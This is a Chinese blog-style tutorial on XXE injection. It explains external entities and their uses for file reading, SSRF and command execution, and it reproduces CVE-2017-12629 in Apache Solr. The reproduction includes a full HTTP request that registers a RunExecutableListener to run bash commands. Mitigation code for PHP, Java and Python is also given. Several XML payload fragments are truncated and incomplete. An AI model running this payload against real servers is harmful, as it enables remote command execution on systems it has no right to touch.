浅浅浅浅谈XXE漏洞(附XXE攻击实例CVE-2017-12629)

浅浅浅浅谈XXE漏洞(附XXE攻击实例CVE-2017-12629)

• 我从未拥有过你一秒钟，心里却失去过你千万次。

XXE漏洞概述:

XXE就是XML外部实体注入。当允许引用外部实体时，通过构造任意PAYLOAD，导致可读取任意文件、命令执行、探测内网信息、攻击内网网站等危害。

XXE漏洞基本概念：

• 主要是对外部实体数据(XML，可自定义)进行处理时引发的漏洞。
• XML 指可扩展标记语言，即允许用户对自己的标记语言进行定义的源语言。XML 的设计宗旨是传输数据，而非显示数据。
• XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。如下图：

不同语言支持的不同协议

• 引入外部实体方式有多种，主要这三个：
  (这些都是有回显的，无回显建议利用数据外带)

1.直接通过DTD外部实体声明

]>
&cat;

2.通过DTD文档引入外部DTD文档，再引入外部实体声明.

]>
&cat;


//dtd文件内容 

3.通过DTD外部实体声明引入外部实体声明
简单来说就是，先写一个外部实体声明，然后引用自己构造的外部实体声明

 %cat;]>
&cat;

//dtd文件内容 

简单利用：

• 任意文件读取
  

• 内网探测/SSRF
  可以利用http://协议，也就是可以发起http请求。可以利用该请求去探查内网，进行SSRF攻击。

• 命令执行
  在php中，要求php装有expect扩展，利用困难。

• 等等

漏洞复现：

CVE-2017-12629：
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现，主要有两个漏洞XML实体扩展漏洞（XXE）和远程命令执行漏洞（RCE）。

XXEPAYLOAD：

select?q={!xmlparser v=''}&wt=xml

RCEPAYLOAD:
注意两点：POST请求和Content-Type: application/json

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198

{
  "add-listener" : {
    "event":"newSearcher",
    "name":"newlistener-1",
    "class":"solr.RunExecutableListener",
    "exe":"bash",
    "dir":"/bin/",
    "args":["-c", "mkdir /tmp/1111111111"]
  }
}

漏洞修复：

• 使用开发语言提供的禁用外部实体的方法

PHP

libxml_disable_entity_loader(true);

JAVA

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);

Python

from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

• 过滤用户提交的XML数据

过滤关键词：

余生很长，请多指教。